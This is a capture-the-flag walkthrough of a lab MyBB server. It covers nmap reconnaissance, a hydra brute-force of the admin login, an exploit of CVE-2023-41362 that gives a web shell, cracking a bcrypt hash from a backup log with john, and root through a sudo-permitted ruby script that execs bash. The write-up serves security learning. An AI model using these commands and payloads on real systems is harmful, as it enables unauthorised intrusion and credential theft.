MyBB

Reconnaissance

┌──(zwique㉿zwique)-[~/Downloads]
└─$ nmap -sC -sV 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 21:54 +08
Nmap scan report for 172.17.0.2
Host is up (0.0000010s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: MyBB
MAC Address: 02:42:AC:11:00:02 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds

Great!!! We're given only one open port, which is http.

Visit the homepage of the website built with MyBB using the following URL. Then it leads to the panel page, where you can see admin's account. Afterward, I ran gobuster , ffuf , and other fuzzing tools on the website. You'll eventually find this endpoint of admin's dashboard. [22:00:32] 200 - 810B - /admin

www-data

It shows us the login page. So, I thought bruteforcing the password could be possible since the username is known as admin. However, first, there has to be the error message from server in order to complete filtering successful logins.

Invalid administration session. -> after giving wrong password

Final Command to bruteforce the password using hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 16 panel.mybb.dl http-post-form "/admin/index.php:username=^USER^&password=^PASS^&login=Login:Invalid administration session."

Try the list of possible passwords one-by-one until you login as admin.

Credentials of admin: admin:babygirl

CVE-2023-41362

As you can see, it clearly shows the late version of MyBB Open Source Forum Software, which led me to search for RCE.

Cool. It's vulnerable to Temple Code Injection. More detailed information can be found here.

National Vulnerability Database
MyBB before 1.8.36 allows Code Injection by users with certain high privileges. Templates in Admin CP intentionally use eval, and there was some validation of the input to eval, but type juggling interfered with this when using PCRE within PHP.

I used this exploit to access www-data

┌──(zwique㉿zwique)-[~/Downloads]
└─$ python3 exploit.py http://panel.mybb.dl admin babygirl
[*] Logging into http://panel.mybb.dl/admin/ as admin
WARNING: Template already contains our payload code? Skipping to sending commands...
[*] Testing code exec...
[*] Shell is working
[*] Special commands: exit (quit), remove (removes backdoor), config (prints mybb config), dump (dumps user table)
Enter Command>

Using penelope for get more powerful/optimized shell.

Alice

Check /etc/passwd to see the registered users. Alice, nice, but we'll need password of this username.

alice:x:1001:1001:,,,:/home/alice:/bin/bash

The MyBB database backup directory is located at the admin/backups/ folder within your MyBB installation, but this is a non-public directory and the backups are not meant to be stored there permanently for security reasons. For security, you should download backups and store them in a separate, off-server location, and regularly remove them from the admin/backups/ directory after downloading.

Inside /backups directory, there's a kinda log file that tracks the login dates of users. As you can see below, user alice's password is saved as hash bcrypt.

www-data@2d24df195f0d:/var/www/mybb/backups$ cat data 
2024-06-16 12:00:00,INFO,Connection established from IP 192.168.1.10
2024-06-16 12:05:23,ERROR,Failed login attempt from IP 192.168.1.12
2024-06-16 12:10:45,INFO,User 'john' logged in
2024-06-16 12:15:47,INFO,Query executed: SELECT * FROM users WHERE id=1
2024-06-16 12:20:00,WARN,Slow query execution: 5 seconds
2024-06-16 12:25:13,INFO,Query executed: INSERT INTO logs (message) VALUES ('test')
2024-06-16 12:30:05,INFO,User 'alice' logged out
2024-06-16 12:35:33,INFO,User 'alice' attempted login with password '$2y$10$OwtjLEqBf9BFDtK8sSzJ5u.gR.tKYfYNmcWqIzQBbkv.pTgKX.pPi'
2024-06-16 12:40:00,ERROR,Database connection lost
2024-06-16 12:45:12,INFO,Database connection reestablished
2024-06-16 12:50:23,INFO,Query executed: UPDATE users SET last_login='2024-06-16' WHERE username='admin'
2024-06-16 12:55:44,ERROR,Permission denied for user 'guest' on database 'main'
2024-06-16 13:00:05,INFO,User 'jane' logged in
2024-06-16 13:05:29,INFO,Query executed: DELETE FROM sessions WHERE session_id='abc123'
2024-06-16 13:10:00,WARN,High memory usage detected
2024-06-16 13:15:32,INFO,User 'admin' logged in
2024-06-16 13:20:18,INFO,Query executed: SELECT * FROM orders WHERE status='pending'
2024-06-16 13:25:42,INFO,User 'admin' logged out
2024-06-16 13:30:55,ERROR,Failed login attempt from IP 192.168.1.15
2024-06-16 13:35:07,INFO,Backup process started
2024-06-16 13:40:11,INFO,Backup process completed successfully
2024-06-16 13:45:21,ERROR,Failed login attempt from IP 192.168.1.16
2024-06-16 13:50:29,INFO,Query executed: SELECT * FROM transactions WHERE amount > 1000
2024-06-16 13:55:37,INFO,User 'alice' logged in
2024-06-16 14:00:45,INFO,Query executed: INSERT INTO transactions (user_id, amount) VALUES (2, 1500)
2024-06-16 14:05:53,INFO,User 'alice' logged out
2024-06-16 14:10:00,ERROR,Database connection timeout
2024-06-16 14:15:08,INFO,Database connection reestablished
2024-06-16 14:20:16,INFO,User 'admin' logged in
2024-06-16 14:25:24,INFO,Query executed: SELECT * FROM users
2024-06-16 14:30:32,ERROR,Failed login attempt from IP 192.168.1.18
2024-06-16 14:35:40,WARN,Disk space running low
2024-06-16 14:40:48,INFO,Disk cleanup started
2024-06-16 14:45:56,INFO,Disk cleanup completed successfully
2024-06-16 14:50:04,INFO,User 'admin' logged out
2024-06-16 14:55:12,ERROR,Failed login attempt from IP 192.168.1.20
2024-06-16 15:00:20,INFO,User 'bob' logged in
2024-06-16 15:05:28,INFO,Query executed: SELECT COUNT(*) FROM orders
2024-06-16 15:10:36,INFO,User 'bob' logged out
2024-06-16 15:15:44,INFO,User 'carol' logged in
2024-06-16 15:20:52,INFO,Query executed: SELECT * FROM products WHERE category='electronics'
2024-06-16 15:26:00,ERROR,Failed login attempt from IP 192.168.1.22
2024-06-16 15:30:08,INFO,User 'carol' logged out
2024-06-16 15:35:16,INFO,Query executed: UPDATE products SET stock=stock-1 WHERE id=3
2024-06-16 15:40:24,INFO,User 'dave' logged in
2024-06-16 15:45:32,INFO,Query executed: SELECT * FROM customers WHERE last_purchase > '2024-01-01'
2024-06-16 15:50:40,INFO,User 'dave' logged out
2024-06-16 15:55:48,ERROR,Failed login attempt from IP 192.168.1.24
2024-06-16 16:00:56,INFO,User 'admin' logged in
2024-06-16 16:05:04,INFO,Query executed: DELETE FROM logs WHERE log_date < '2024-01-01'
2024-06-16 16:10:12,INFO,User 'admin' logged out
2024-06-16 16:15:20,ERROR,Database error: Deadlock detected
2024-06-16 16:20:28,INFO,Database error resolved
2024-06-16 16:25:36,INFO,Query executed: SELECT * FROM sessions WHERE active=1
2024-06-16 16:30:44,INFO,User 'admin' logged in
2024-06-16 16:35:52,INFO,Query executed: INSERT INTO sessions (user_id, session_start) VALUES (1, '2024-06-16 16:35:52')
2024-06-16 16:40:00,INFO,User 'admin' logged out
2024-06-16 16:45:08,INFO,User 'eve' logged in
2024-06-16 16:50:16,INFO,Query executed: SELECT * FROM logs WHERE log_level='ERROR'
2024-06-16 16:55:24,INFO,User 'eve' logged out
2024-06-16 17:00:32,ERROR,Failed login attempt from IP 192.168.1.26
2024-06-16 17:05:40,INFO,User 'frank' logged in
2024-06-16 17:10:48,INFO,Query executed: UPDATE orders SET status='shipped' WHERE id=10
2024-06-16 17:15:56,INFO,User 'frank' logged out
2024-06-16 17:20:04,WARN,CPU usage exceeds 90%
2024-06-16 17:25:12,INFO,CPU usage normalized
2024-06-16 17:30:20,INFO,User 'admin' logged in
2024-06-16 17:35:28,INFO,Query executed: SELECT * FROM payments WHERE status='completed'
2024-06-16 17:40:36,ERROR,Failed login attempt from IP 192.168.1.28
2024-06-16 17:45:44,INFO,User 'admin' logged out
2024-06-16 17:50:52,INFO,User 'grace' logged in
2024-06-16 17:55:00,INFO,Query executed: SELECT * FROM reviews WHERE rating=5
2024-06-16 18:00:08,INFO,User 'grace' logged out
2024-06-16 18:05:16,INFO,User 'admin' logged in
2024-06-16 18:10:24,INFO,Query executed: DELETE FROM reviews WHERE review_date < '2023-01-01'
2024-06-16 18:15:32,INFO,User 'admin' logged out
2024-06-16 18:20:40,ERROR,Database error: Out of memory
2024-06-16 18:25:48,INFO,Database memory allocation increased
2024-06-16 18:30:56,INFO,Query executed: SELECT * FROM orders WHERE order_date = '2024-06-16'
2024-06-16 18:36:04,INFO,User 'admin' logged in

Hash Cracking

$2y$10$OwtjLEqBf9BFDtK8sSzJ5u.gR.tKYfYNmcWqIzQBbkv.pTgKX.pPi

┌──(zwique㉿zwique)-[~/Downloads]
└─$ john --format=bcrypt hash

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 5 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
tinkerbell       (?)     
1g 0:00:00:12 DONE 2/3 (2025-09-03 22:35) 0.08032g/s 149.3p/s 149.3c/s 149.3C/s tabatha..trombone
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Done!!! creds are alice:tinkerbell

Root

A simple privilege escalation technique can be applied here, as the scripts directory allows any ruby script to run without restrictions.

Set up the payload (calling shell as root):

alice@2d24df195f0d:~/scripts$ cat pwn.rb 
#!/usr/bin/env ruby
exec "/bin/bash"

Make it executable and run the file. Done

alice@2d24df195f0d:~/scripts$ chmod +x pwn.rb
alice@2d24df195f0d:~/scripts$ sudo ./pwn.rb
root@2d24df195f0d:/home/alice/scripts# ls
pwn.rb
root@2d24df195f0d:/home/alice/scripts# whoami
root

Feel free to edit the index.html at the end in /var/www/html directory.

PreviousPingCTF NextCertificates

Last updated 4 months ago

hashtagReconnaissance

hashtagwww-data

hashtagCVE-2023-41362

hashtagNational Vulnerability Databasearrow-up-right

hashtagAlice

hashtagHash Cracking

hashtagRoot